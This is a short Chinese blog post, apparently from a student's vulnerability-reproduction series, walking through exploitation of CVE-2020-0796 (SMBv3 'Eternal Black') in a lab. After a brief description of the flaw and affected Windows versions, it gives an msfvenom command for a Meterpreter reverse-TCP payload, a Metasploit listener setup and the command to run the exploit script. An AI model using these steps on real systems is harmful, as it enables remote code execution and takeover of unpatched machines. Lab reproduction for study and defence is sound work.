CVE-2020-0796永恒之黑漏洞复现

  • Post author:
  • Post category:其他


✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆

🔥系列专栏 :内网安全-漏洞复现

📃新人博主 :欢迎点赞收藏关注,会回访!

💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


文章目录



简介

2020年3月12日,微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”。

本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒之黑一旦被成功利用,其危害不亚于永恒之蓝。

受影响版本:

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

建立新的代码:


msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.204.160 lport=9999 -b'x00’ -f python


粘贴到脚本:


USER_PAYLOAD = buf


开启监听:


use exploit/multi/ handler



set payload windows/x64/meterpreter/reverse_tcp



set lhost



set lport



run


使用脚本进行攻击:


python3 exploit.py -ip 192.168.204.160



版权声明:本文为qq_53517370原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。